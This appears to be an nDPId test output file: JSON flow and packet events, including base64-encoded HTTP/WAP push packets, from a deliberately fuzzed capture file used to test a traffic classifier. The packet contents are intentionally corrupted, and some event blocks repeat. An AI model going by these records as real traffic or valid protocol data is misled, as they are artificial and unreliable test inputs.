01413{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":120,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":3,"flow_last_seen":1031854565448,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":762,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":762,"pkt_l4_len":728,"thread_ts_msec":1031854565448,"pkt":"CAAgZV17c1CLk5N8CABFAALsT0tAAIAGSoasFAMFrBQDDQowAFDlXnSkyvaTgVAYIjgpLgAAUE9TVCAvc2VydmxldHMvbW1zIEhUVFAvMS4xDQpI9HN0OiAxNzIuMjAuMy4xMw0KcW9udE1udC1UeXBlOiBhcHBsaWNhdGl\/bi94bWwNCkNvbnRlbnQtTGVuZ3RoOiA2MDYNCg0KPD94bWwgdmVyc2lvbj0iMS6wIj8+CjwhRE9DVFlQRSBwYXAgUFVCTElBICItLy9XQVBGT1JVTS8vRFREIFBBUCAxLjAvL0VOIgogICAgICAgICAgImh0dHA6Ly93d3cud2twZm9ydW0ub3JnL0RURC9wYXBfMS4wLrx0ZMA+CjxwYVM+CiAgPHJlc3VsdC5vdGlmaWNhdGlvbi1tZXNzYWdlIHB1T2gtaWQ9IjFoOTMwMV8xMDMxODU0NTYyNDgyXzEwMzhAZ2VjZHMyLm1vYmlsaXR5bGFiLm5ldCIgc2VuZGVyLWFkZHJlc3M9Imh0dHA6Ly9sbWNtb2xmLndhcG1hdGljLmRlIiBzZW5kZXItbmFpZT0id2dwNCIgcmVjZWl2dmQtdGltcT0iNjAwMi0wOS0xMlQxODowMDowOVoiIGV2ZW50LXRpbWU9IjIwMDItMDktMTJUMTg6MDA6MTJaIiBtZXNzYWdlLXN0YXRlPSJkZWyDdmVyZWQiIGNvZGU9IjEwMDBYPgogICAgPGFkZHJlc3MgYWRkcu5zcy12YWx1ZUIiV0FQUFVTSD0rNDkxNzI2MTAxMDA0L1RZUEU9UExNTkAxNzIuMjAuMy41Ij48L2FkZHJlc3M+CiAgICA8cXVhbGl0eS1vZi1zZXJ2aWNlIGRlbGl2ZXJ5LW1ldGhvZD0idW5jb25maXJtZWR0IG5ldHdvcms9IkdTTSI+PC9xa2FsaXR5LW9mLXNlcnZpY2U+CiAgPC9yZXN1bHRub3RpZmljYXRpb24tbWVzc2FnZT4KPC9wYXA+"}
00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":120,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1031854565447,"flow_last_seen":1031854565448,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":708,"flow_tot_l4_payload_len":708,"flow_avg_l4_payload_len":236,"midstream":0,"thread_ts_msec":1031854565448,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2608,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":121,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854565449,"flow_last_seen":1031854565449,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854565449,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.148.5","src_port":80,"dst_port":2608,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":121,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1031854565449,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854565449,"pkt":"AFCLk5MlcwAgsl17CABFAAAoxN1AAEAGF7isFAMNrBSUBQBQCjDK9viB5V53aFEQgywIrgAA"}
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":118,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854565447,"flow_last_seen":1031854565447,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854565447,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2608,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":118,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1031854565447,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1031854565447,"pkt":"AFCLk5N8CAAgsl17CABFAAAsxNxAAEQGF7WsFAMNrBQDBQBQCjDK9pOA5V50pGASgyzztQAAAgQFtA=="}
00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":119,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1031854565448,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1031854565448,"pkt":"CAAgsl17AFCLk5N8CABFAAAoTktAAIAGTkqsFAMFrBQDDQowAFDlXnSkyvaTgVAQIgtsZgAAAgQFtCiq"}
01413{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":120,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":3,"flow_last_seen":1031854565448,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":762,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":762,"pkt_l4_len":728,"thread_ts_msec":1031854565448,"pkt":"CAAgZV17c1CLk5N8CABFAALsT0tAAIAGSoasFAMFrBQDDQowAFDlXnSkyvaTgVAYIjgpLgAAUE9TVCAvc2VydmxldHMvbW1zIEhUVFAvMS4xDQpI9HN0OiAxNzIuMjAuMy4xMw0KcW9udE1udC1UeXBlOiBhcHBsaWNhdGl\/bi94bWwNCkNvbnRlbnQtTGVuZ3RoOiA2MDYNCg0KPD94bWwgdmVyc2lvbj0iMS6wIj8+CjwhRE9DVFlQRSBwYXAgUFVCTElBICItLy9XQVBGT1JVTS8vRFREIFBBUCAxLjAvL0VOIgogICAgICAgICAgImh0dHA6Ly93d3cud2twZm9ydW0ub3JnL0RURC9wYXBfMS4wLrx0ZMA+CjxwYVM+CiAgPHJlc3VsdC5vdGlmaWNhdGlvbi1tZXNzYWdlIHB1T2gtaWQ9IjFoOTMwMV8xMDMxODU0NTYyNDgyXzEwMzhAZ2VjZHMyLm1vYmlsaXR5bGFiLm5ldCIgc2VuZGVyLWFkZHJlc3M9Imh0dHA6Ly9sbWNtb2xmLndhcG1hdGljLmRlIiBzZW5kZXItbmFpZT0id2dwNCIgcmVjZWl2dmQtdGltcT0iNjAwMi0wOS0xMlQxODowMDowOVoiIGV2ZW50LXRpbWU9IjIwMDItMDktMTJUMTg6MDA6MTJaIiBtZXNzYWdlLXN0YXRlPSJkZWyDdmVyZWQiIGNvZGU9IjEwMDBYPgogICAgPGFkZHJlc3MgYWRkcu5zcy12YWx1ZUIiV0FQUFVTSD0rNDkxNzI2MTAxMDA0L1RZUEU9UExNTkAxNzIuMjAuMy41Ij48L2FkZHJlc3M+CiAgICA8cXVhbGl0eS1vZi1zZXJ2aWNlIGRlbGl2ZXJ5LW1ldGhvZD0idW5jb25maXJtZWR0IG5ldHdvcms9IkdTTSI+PC9xa2FsaXR5LW9mLXNlcnZpY2U+CiAgPC9yZXN1bHRub3RpZmljYXRpb24tbWVzc2FnZT4KPC9wYXA+"}
00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":120,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1031854565447,"flow_last_seen":1031854565448,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":708,"flow_tot_l4_payload_len":708,"flow_avg_l4_payload_len":236,"midstream":0,"thread_ts_msec":1031854565448,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2608,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":121,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854565449,"flow_last_seen":1031854565449,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854565449,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.148.5","src_port":80,"dst_port":2608,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":121,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1031854565449,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854565449,"pkt":"AFCLk5MlcwAgsl17CABFAAAoxN1AAEAGF7isFAMNrBSUBQBQCjDK9viB5V53aFEQgywIrgAA"}
00561{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":122,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854565547,"flow_last_seen":1031854565547,"flow_idle_time":600000,"flow_min_l4_payload_len":507,"flow_max_l4_payload_len":507,"flow_tot_l4_payload_len":507,"flow_avg_l4_payload_len":507,"midstream":0,"thread_ts_msec":1031854565547,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","l4_proto":115,"flow_datalink":1,"flow_max_packets":3}
01119{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":122,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1031854565547,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":541,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":541,"pkt_l4_len":507,"thread_ts_msec":1031854565547,"pkt":"AFCLk5N8CAAgsl17CABFAAIPxN5AACVzANCsFAMNrBQDBQBQCjDK9pOB5V53aFAYgywfUQAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IFJlc2luLzIuMC4xDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3htbA0KQ29udGVudC1MZW5ndGg6IDM1OA0KRGF0ZTogVGh1LCAxMiBTZXAgMjA0MiAxODoxNjowNTBHTVQNCg0KPD94bWwgdmVyc2lvbj0iMS4wIj8+DQo8IURPQ1RZUEUgcGFwIFBVQkxJQyAiLS8vV0FQRk9SVU0vL0RUlCBQQVAgMS4wLy9FTiIgImh0dHA6Ly93d3cud2FwZm9ydW0ub3JnL0RURC9wYXBfMS4wLmR0ZCI+DQo8cGFwPg0KPFplc3VsdG5vdBBmaWNhdGlvbi1yZXNwb25zZSBwdXNoLWlkPSIxODkPMDFfMTAzMTg1NDU2MjQ4Ml8xMDM4QGdlY2RzMi5tb2JpbGl0eWxhYi5uZXQiIGNvZGU9IjEwMDAiIGRlc2M9Ik9LIj4NCjxhZGRyZXNzIGFkZKqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="}
00217{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":130,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","l4_data_len":20,"global_ts_msec":1031854568982}
00356{"packet_event_id":1,"packet_event_name":"packet","packet_id":130,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":54,"pkt_l4_len":0,"thread_ts_msec":1031854568982,"pkt":"AFCLk5N8CAAgsl17CABFAAAoxOJAl0AGF7OsFAMNrBQDBQBQCi7Kxgh65UF0ElARgyyXWQAA"}
00665{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854489007,"flow_last_seen":1031854489007,"flow_idle_time":7440000,"flow_min_l4_payload_len":89,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":89,"flow_avg_l4_payload_len":89,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.1","dst_ip":"172.20.3.13","src_port":80,"dst_port":53132,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854489007,"flow_last_seen":1031854489007,"flow_idle_time":7440000,"flow_min_l4_payload_len":89,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":89,"flow_avg_l4_payload_len":89,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.1","dst_ip":"172.20.3.13","src_port":80,"dst_port":53132,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1031854489004,"flow_last_seen":1031854494143,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":840,"flow_tot_l4_payload_len":1156,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":53132,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00663{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562690,"flow_last_seen":1031854562690,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.67.13","dst_ip":"172.20.3.5","src_port":53136,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562690,"flow_last_seen":1031854562690,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.67.13","dst_ip":"172.20.3.5","src_port":53136,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1031854562488,"flow_last_seen":1031854567701,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":427,"flow_tot_l4_payload_len":973,"flow_avg_l4_payload_len":81,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":53136,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00663{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562488,"flow_last_seen":1031854562488,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.35.13","src_port":80,"dst_port":53136,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562488,"flow_last_seen":1031854562488,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.35.13","src_port":80,"dst_port":53136,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00662{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562488,"flow_last_seen":1031854562488,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":53193,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
00588{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562488,"flow_last_seen":1031854562488,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":53193,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00665{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854489007,"flow_last_seen":1031854489007,"flow_idle_time":7560000,"flow_min_l4_payload_len":89,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":89,"flow_avg_l4_payload_len":89,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.1","dst_ip":"172.20.3.13","src_port":80,"dst_port":53132,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854489007,"flow_last_seen":1031854489007,"flow_idle_time":7560000,"flow_min_l4_payload_len":89,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":89,"flow_avg_l4_payload_len":89,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.1","dst_ip":"172.20.3.13","src_port":80,"dst_port":53132,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1031854489004,"flow_last_seen":1031854494143,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":840,"flow_tot_l4_payload_len":1156,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":53132,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00663{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562690,"flow_last_seen":1031854562690,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.67.13","dst_ip":"172.20.3.5","src_port":53136,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562690,"flow_last_seen":1031854562690,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.67.13","dst_ip":"172.20.3.5","src_port":53136,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1031854562488,"flow_last_seen":1031854567701,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":427,"flow_tot_l4_payload_len":973,"flow_avg_l4_payload_len":81,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":53136,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00663{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562488,"flow_last_seen":1031854562488,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.35.13","src_port":80,"dst_port":53136,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562488,"flow_last_seen":1031854562488,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.35.13","src_port":80,"dst_port":53136,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00662{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562488,"flow_last_seen":1031854562488,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":53193,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
00588{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562488,"flow_last_seen":1031854562488,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":53193,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00577{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854565547,"flow_last_seen":1031854565547,"flow_idle_time":600000,"flow_min_l4_payload_len":507,"flow_max_l4_payload_len":507,"flow_tot_l4_payload_len":507,"flow_avg_l4_payload_len":507,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","l4_proto":115,"ndpi": {"proto":"Unknown","breed":"Unrated"}}
00562{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854565547,"flow_last_seen":1031854565547,"flow_idle_time":600000,"flow_min_l4_payload_len":507,"flow_max_l4_payload_len":507,"flow_tot_l4_payload_len":507,"flow_avg_l4_payload_len":507,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","l4_proto":115,"flow_datalink":1,"flow_max_packets":3}
00661{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854546079,"flow_last_seen":1031854546079,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.52.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2093,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854546079,"flow_last_seen":1031854546079,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.52.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2093,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
